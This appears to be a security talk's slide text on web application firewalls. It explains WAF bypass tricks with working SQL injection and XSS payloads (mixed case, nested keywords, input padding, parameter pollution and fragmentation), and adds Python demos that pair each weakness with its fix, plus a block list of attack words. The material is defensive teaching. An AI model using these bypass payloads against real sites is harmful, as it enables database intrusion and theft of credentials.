Contact: [email protected] • Cyber security engineer • Programmer/developer • 13 years of work experience with pentesting, code review, development, incident detection, incident response and hardening.
Common attacks in WAF • Custom attacks to bypass WAF • Attack Mitigation in WAF • Attack Mitigation in application • Create your custom WAF • My OpenSource Projects • Attack and Protection!
Each WAF has a different response fingerprint (status code, headers, error page), which is what the following detection tools look for. • https://svn.nmap.org/nmap/scripts/http-waf-detect.nse • https://github.com/sandrogauci/wafw00f • http://code.google.com/p/imperva-detect/
requests and traffic that violate the WAF rule-sets. This is a useful feature, but it needs to be used judiciously: a WAF in an over-aggressive blocking mode prevents legitimate traffic from reaching the web server, making the application unusable. • Sometimes the rules are weak and do not match the attack at all, so it passes through.
is mixed case; the purpose is to bypass rules whose patterns are case sensitive. • SELECT, SeLect, selEcT… UnIOn, unIoN... • Look at the following: • /sell/cars.php?search=<script>alert(document.cookie)</script> • /sell/cars.php?search=<SCripT>AlErt(DoCuMenT.cOoKie)</scrIpt> • Caveat: HTML tag names are case insensitive, but JavaScript identifiers are not, so only the tag can be mixed case; AlErt(DoCuMenT.cOoKie) will not execute in the browser.
this feature strips the critical keywords out of an attack, but it can be bypassed when the stripping is done in a single pass: nest the keyword inside itself, so that what remains after one removal is the original keyword. • Look at the following: • /cars_show.php?car_id=-30 UNIunionON SELselectECT 6,7,8,9 • after the WAF removes the lowercase "union" and "select" once, the backend receives: /cars_show.php?car_id=-30 UNION SELECT 6,7,8,9
validation of input length: many WAFs inspect only the first N bytes of a parameter (or truncate oversized input before matching), so a long harmless prefix pushes the payload past the inspected window. You find the limit with fuzzing tests on input length... • Look at the following: • /cars/id/page/=-25+and+(select 2)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...)+/*!UnIOn*/+/*!selECt*/+4,5,6,7… • id=2 and (select 2)=(select 0xAAAAAAAAAAAAAAAAAAAAA...)+uNIoN+seLecT+2,3,version()...
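The three weaknesses from the preceding slides (case-sensitive rules, single-pass keyword stripping, and a limited inspection window) side by side with their fixes, as an added example that is not code from the slides or from any real WAF. The keyword list, the 64-byte inspection window and the payloads are constructed for the demonstration; the window stands in for the kind of limit you would find by fuzzing input length.

```python
import re

# Added example (not from the slides): a toy WAF rule engine showing the
# three weaknesses from the preceding slides next to their fixes. The
# payloads are constructed to mirror the slides' examples; the 64-byte
# inspection window is a hypothetical limit of the kind found by fuzzing.

KEYWORDS = ("union", "select")
SIG_CASE_SENSITIVE = re.compile(r"union\s+select")          # weak rule
SIG_CASE_INSENSITIVE = re.compile(r"union\s+select", re.I)  # fixed rule


def strip_keywords_once(value: str) -> str:
    """Weak sanitizer: each keyword is removed in one case-sensitive pass,
    so a keyword nested inside itself reassembles after removal."""
    for kw in KEYWORDS:
        value = value.replace(kw, "")
    return value


def strip_keywords_until_stable(value: str) -> str:
    """Fixed sanitizer: case-insensitive, repeated until nothing changes."""
    pattern = re.compile("|".join(KEYWORDS), re.I)
    while True:
        cleaned = pattern.sub("", value)
        if cleaned == value:
            return cleaned
        value = cleaned


def blocked_by_weak_rule(value: str, inspect_bytes: int = 64) -> bool:
    """Weak rule: case-sensitive, and only the first `inspect_bytes` are
    scanned, so a long harmless prefix pushes the payload out of view."""
    return SIG_CASE_SENSITIVE.search(value[:inspect_bytes]) is not None


def blocked_by_fixed_rule(value: str, max_len: int = 4096) -> bool:
    """Fixed rule: reject oversized input outright instead of scanning a
    prefix, and match case-insensitively over the whole value."""
    if len(value) > max_len:
        return True
    return SIG_CASE_INSENSITIVE.search(value) is not None


def demo() -> dict:
    mixed = "-30 UnIOn SeLecT 6,7,8,9"                       # mixed case
    nested = "-30 UNIunionON SELselectECT 6,7,8,9"           # nested keywords
    padded = "-25 and (select 2)=(select 0x" + "A" * 200 + ") union select 4,5,6"
    return {
        "mixed_weak": blocked_by_weak_rule(mixed),      # False: rule misses it
        "mixed_fixed": blocked_by_fixed_rule(mixed),    # True
        "nested_once": strip_keywords_once(nested),     # '-30 UNION SELECT 6,7,8,9'
        "nested_stable": strip_keywords_until_stable(nested),
        "padded_weak": blocked_by_weak_rule(padded),    # False: payload is past byte 64
        "padded_fixed": blocked_by_fixed_rule(padded),  # True
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

Note the asymmetry: the nested-keyword trick only helps against a WAF that strips and forwards; against a WAF that blocks on match, the backend would receive the unusable UNIunionON text anyway. Rejecting oversized input is also safer than silently scanning a prefix, because the rejection is visible in logs while a skipped suffix is not.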
conduct an attack: • /?id=1;select+4,5,6+from+users+where+id=1-- • This request will be performed successfully using HPP (the WAF inspects each id value separately, while the backend joins them): • /?id=1;select+4&id=5,6+from+users+where+id=1-- • Whether an HPP attack bypasses the WAF depends on the environment of the application being attacked: how the backend handles duplicate parameters (for example ASP.NET/IIS concatenates them with a comma, while PHP/Apache keeps only the last value).
a=".input_a." and b=".input_b); execute_query("select * from table where a=".input_a." and b=".input_b." limit ".input_c); • The following request doesn't allow anyone to conduct an attack: • /?a=1+union+select+1,2/* • These requests are a possible attack using HPF (HTTP Parameter Fragmentation), spreading the payload over parameters that look harmless on their own: • /?a=1+union/*&b=*/select+1,2 • /?a=1+union/*&b=*/select+1,pass/*&c=*/from+users-- • The SQL queries become: • select * from table where a=1 union/* and b=*/select 1,2 • select * from table where a=1 union/* and b=*/select 1,pass/* limit */from users--
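A simulation of why HPP and HPF slip past a WAF that inspects each parameter value on its own, as an added example that is not code from the slides. The signature regex, the backend's comma-joining of duplicate parameters (the ASP.NET/IIS behaviour) and the two SQL templates are constructed for the demonstration and mirror the requests shown on the two preceding slides.

```python
import re
from urllib.parse import unquote_plus

# Added example (not from the slides): why HPP and HPF pass a per-parameter
# WAF check. Signature, backend join behaviour and SQL templates are
# constructed for the demonstration.

# Toy signature: "union select" or "select ... from".
SIGNATURE = re.compile(r"union\s+select|select\s.*\sfrom", re.I)


def parse_query(query: str) -> list:
    """Split a query string on '&' only, keeping duplicate names in order."""
    pairs = []
    for part in query.lstrip("?").split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def waf_per_value(query: str) -> bool:
    """Weak WAF: every parameter value is matched separately."""
    return any(SIGNATURE.search(v) for _, v in parse_query(query))


def backend_params(query: str, sep: str = ",") -> dict:
    """Backend that joins duplicate parameters with `sep` (IIS/ASP.NET style)."""
    params = {}
    for name, value in parse_query(query):
        params[name] = value if name not in params else params[name] + sep + value
    return params


def waf_like_backend(query: str) -> bool:
    """Fixed WAF for HPP: inspect the value the backend will actually see."""
    return any(SIGNATURE.search(v) for v in backend_params(query).values())


def sql_hpp(query: str) -> str:
    """The slide's vulnerable query: id is concatenated straight into SQL."""
    return "select * from table where id=" + backend_params(query)["id"]


def sql_hpf(query: str) -> str:
    """The slide's three-parameter template: a, b and c are concatenated."""
    p = backend_params(query)
    return (f"select * from table where a={p['a']} and b={p['b']}"
            f" limit {p.get('c', '10')}")


if __name__ == "__main__":
    hpp = "id=1;select+4&id=5,6+from+users+where+id=1--"
    hpf = "a=1+union/*&b=*/select+1,pass/*&c=*/from+users--"
    print(waf_per_value(hpp), waf_like_backend(hpp), sql_hpp(hpp))
    print(waf_per_value(hpf), sql_hpf(hpf))
```

For HPP the WAF can be fixed by normalizing duplicate parameters exactly as the backend does (which means knowing the backend). HPF has no such fix at the WAF: each fragment is legitimate in isolation, and only the application's string concatenation reassembles the statement, which is why the mitigation belongs in the application (next slide).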
• Prepared statements (with parameterized queries) as the primary control. • A function that checks a block list of common attack words (eval, timeout, union, --, select, delete, version, benchmark, sleep, /**/...), lowercasing the whole string before matching; but as the previous slides show, such lists are bypassable, so treat this as defence in depth, not as the fix. • Study your ORM (SQLAlchemy, Hibernate...) to avoid pitfalls in the features that still accept raw SQL. • Follow MITRE and OWASP guidance for hardening etc...
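The first two mitigations in working form, as an added example that is not code from the slides: the same lookup written with string concatenation and with a parameterized query, run against an in-memory SQLite table constructed for the demonstration, plus the lowercased block-list check the slide suggests. Table, rows and payload are assumptions made for the example.

```python
import sqlite3

# Added example (not from the slides): concatenated vs parameterized query
# against a constructed in-memory SQLite table, plus the slide's block list.

BLOCK_LIST = ("eval", "timeout", "union", "--", "select", "delete",
              "version", "benchmark", "sleep", "/**/")


def setup_db() -> sqlite3.Connection:
    """Constructed sample data for the demonstration."""
    con = sqlite3.connect(":memory:")
    con.execute("create table users(id integer, name text, pass text)")
    con.executemany("insert into users values (?, ?, ?)",
                    [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return con


def lookup_concat(con: sqlite3.Connection, user_id: str) -> list:
    """Vulnerable: the input becomes part of the SQL text."""
    return con.execute("select id, name from users where id=" + user_id).fetchall()


def lookup_param(con: sqlite3.Connection, user_id: str) -> list:
    """Fixed: the input is bound as a value and is never parsed as SQL."""
    return con.execute("select id, name from users where id=?", (user_id,)).fetchall()


def block_list_hit(value: str) -> bool:
    """Secondary control only: lowercase first, then look for attack words.
    The previous slides show how lists like this are bypassed."""
    lowered = value.lower()
    return any(word in lowered for word in BLOCK_LIST)


def demo() -> dict:
    con = setup_db()
    payload = "1 union select id, pass from users"
    return {
        "concat_rows": sorted(lookup_concat(con, payload)),  # leaks the pass column
        "param_rows": lookup_param(con, payload),            # [] : no row has that id
        "param_ok": lookup_param(con, "1"),                  # [(1, 'alice')]
        "block_list": block_list_hit("1 UnIoN SeLeCt id, pass from users"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result!r}")
```

With the parameterized version the payload is compared against the id column as a literal string and matches nothing; no amount of case mixing or keyword nesting changes that, which is why it is the primary control and the block list is only a second layer.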
raw sockets • Demultiplexer problems (select(), epoll(), kqueue(), pthreads, MPI…) • Race conditions • Testing a long list of libraries: libuv (used by Node.js), libevent, Python Twisted
The demultiplexer uses select() with pthreads • Known problem: race conditions under millions of connections (a mutex lock cannot save it), and select() itself is limited to FD_SETSIZE descriptors per set. • Easy to understand • github.com/CoolerVoid/RaptorWAF